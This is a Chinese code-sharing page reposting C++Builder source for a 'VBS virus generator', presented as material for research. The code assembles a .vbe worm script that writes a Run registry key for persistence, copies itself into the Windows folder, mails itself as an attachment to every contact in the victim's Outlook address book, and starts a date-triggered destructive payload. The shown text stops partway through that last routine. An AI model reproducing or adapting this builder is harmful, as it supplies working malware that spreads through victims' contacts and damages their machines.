?? 一個vbs病毒生成器核心代碼.txt
字號:
該程序來源于網絡上,是我們收集來供大家研究交流,根據作者說:
程序經過加殼壓縮后僅200來K,但由于窗口文件較多,所以文件比較雜亂,所以把核心文件整理出來,供大家參考。其中注冊功能未公開實屬無奈之舉,有看不懂的問題可以向zsy2@citiz.net來信詢問。
以下程序在windows ME用C++Builder5.0編譯通過。歡迎和高手一起探討開發,不得將下列代碼在媒體發表。
unit1.cpp
//-----------------------------------------
#include
#include
#include
#pragma hdrstop
#include "Unit2.h"
#include "Unit3.h"
#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
Tform1 *form1;
//---------------------------------------------------------------------------
__fastcall Tform1::Tform1(TComponent* Owner)
: Tform(Owner)
{
}//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
void __fastcall Tform1::Label1Click(TObject *Sender)
{
ShellExecute(Handle,NULL,"http://zsyangel.yeah.net",NULL,NULL,SW_SHOWNORMAL);
}
//---------------------------------------------------------------------------
//--------------------------------------------------------
void __fastcall Tform1::CheckBox3Click(TObject *Sender)
{
if (CheckBox3->Checked==true)
{
Edit8-> Enabled=true;
Edit8->Color=clHighlightText;
Edit9-> Enabled=true;
Edit9->Color=clHighlightText;
Edit10-> Enabled=true;
Edit10->Color=clHighlightText;}
else
{Edit8-> Enabled=false;
Edit8->Color=clBtnFace;
Edit9-> Enabled=false;
Edit9->Color=clBtnFace;
Edit10-> Enabled=false;
Edit10->Color=clBtnFace;}
}
//--------下面數行用來限制按健,防止無效數據,造成溢出-------------------------------------------------------------------
void __fastcall Tform1::CheckBox4Click(TObject *Sender)
{
if(Edit4->Enabled==true)
{Edit4->Enabled=false;}
else
{Edit4->Enabled=true;}
}
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit4KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit8KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit9KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit10KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit5KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit4Exit(TObject *Sender)
{
AnsiString edit4=Edit4->Text;
if (StrToInt (edit4)<1||StrToInt (edit4)>10000)
{ ShowMessage("超出范圍,請不要添太大或太小");
Edit4->Text="";}
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit8Exit(TObject *Sender)
{
AnsiString edit8=Edit8->Text;
if (StrToInt (edit8)<1982||StrToInt (edit8)>2050)
{ ShowMessage("超出范圍,請不要添太大或太小");
Edit8->Text="2001";}
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit9Exit(TObject *Sender)
{
AnsiString edit9=Edit9->Text;
if (StrToInt (edit9)<1||StrToInt (edit9)>12)
{ ShowMessage("超出范圍,請不要添太大或太小");
Edit9->Text="1";}
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Edit10Exit(TObject *Sender)
{
AnsiString edit10=Edit10->Text;
if (StrToInt (edit10)<1||StrToInt (edit10)>31)
{ ShowMessage("超出范圍,請不要添太大或太小");
Edit10->Text="1";}
}
//---------------------------------------------------------------------------
//---------------主要代碼------------------------------------------------------------
void __fastcall Tform1::BitBtn1Click(TObject *Sender)
{
AnsiString g=Edit1->Text+".vbe";//在當前目錄下生成VBE文件
i=FileCreate(g );
AnsiString a1=""Created by " ;
AnsiString a=Edit2->Text;
AnsiString b="\r\n";
AnsiString z=a1+a+b;
char c[1000];
strcpy(c, z.c_str());
FileWrite(i,c,strlen(c));
if (CheckBox1->Checked==true)//讓病毒修改注冊表項
{AnsiString a3=" Dim wsh\r\n Set wsh=CreateObject(\"WScript.Shell\")\r\n on error resume next \r\n wsh.regwrite \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\kv3000\",\"c:\\windows\\";
AnsiString a31=Edit1->Text;
AnsiString a32=".vbe\"\r\n";
AnsiString a33="Set fso= Createobject\(\"Scripting.FileSystemObject\"\)\r\nSet InF=fso.OpenTextFile\(WScript.ScriptFullname,1\)\r\nDo While InF.AtEndOfStream<>True\r\nScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf \r\nLoop\r\nSet OutF=fso.OpenTextFile\(\"c:\\windows\\";
AnsiString a34=Edit1->Text;
AnsiString a35=".vbe\",2,true\)\r\nOutF.write ScriptBuffer\r\n ";
AnsiString a4=a3+a31+a32+a33+a34+a35;
char c1[10000];
strcpy(c1, a4.c_str());
FileWrite(i,c1,strlen(c1));
}
TabSheet1->Enabled=true;
TabSheet1->Show() ;
TabSheet0->Enabled=false;
}
//---------------------------------------------------------------------------
void __fastcall Tform1::Label4Click(TObject *Sender)
{
ShellExecute(Handle,"open","mailto:zsy2@citiz.net",NULL,NULL,SW_SHOW);
}
//---------------------------------------------------------------------------
void __fastcall Tform1::BitBtn2Click(TObject *Sender)//此幾行代碼負責病毒從outlook傳播
{
AnsiString bb="if wsh.regread \(\"HKCU\\software\\a\\a\"\)<> \"1\" then out\r\nsub out\r\n";
AnsiString b1="On Error Resume Next\r\n";
AnsiString b2="Set Outlook = CreateObject(\"Outlook.Application\")\r\nIf Outlook = \"Outlook\" Then\r\nSet Mapi=Outlook.GetNameSpace(\"MAPI\")\r\nSet Lists=Mapi.AddressLists\r\nFor Each ListIndex In Lists\r\nIf ListIndex.AddressEntries.Count <> 0 Then\r\nContactCount = ListIndex.AddressEntries.Count\r\nFor Count= 1 To ";
AnsiString b9="ContactCount";
AnsiString b7= Edit4->Text;
AnsiString b8="\r\nSet Mail = Outlook.CreateItem(0)\r\nSet Contact = ListIndex.AddressEntries(Count)\r\nMail.To = Contact.Address\r\nMail.Subject = \"";
AnsiString b3=Edit11->Text;
AnsiString b4="\"\r\nMail.Body = \"" ;
AnsiString b5=Edit13->Text;
AnsiString b6="\"\r\nSet Attachment=Mail.Attachments\r\n Attachment.Add Folder & \" c:\\windows\\";
AnsiString bb1=Edit1->Text;
AnsiString bb2=".vbe\"\r\nMail.Send\r\nnext\r\n End if\r\nnext\r\n End if\r\nend sub\r\nwsh.regwrite \"HKCU\\software\\a\\a\", \"1\"\r\n";
if (CheckBox4->Checked==true)
{
AnsiString B=bb+b1+b2+b9+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));
}
else
{AnsiString B=bb+b1+b2+b7+b8+b3+b4+b5+b6+bb1+bb2;
char b[10000];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));}
TabSheet2->Enabled=true;
TabSheet2->Show() ;
TabSheet1->Enabled=false;
}
//------------------------此下代碼負責破壞功能---------------------------------------------------
void __fastcall Tform1::BitBtn3Click(TObject *Sender)
{
TabSheet3->Enabled=true;
TabSheet3->Show() ;
if (CheckBox3->Checked==true)
{{AnsiString d1=" \r\nif year(date)&month(date)&day(date)= ";//設定病毒發作時間
AnsiString dyear=Edit8->Text;
AnsiString dmon_th=Edit9->Text;
AnsiString dday=Edit10->Text;
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -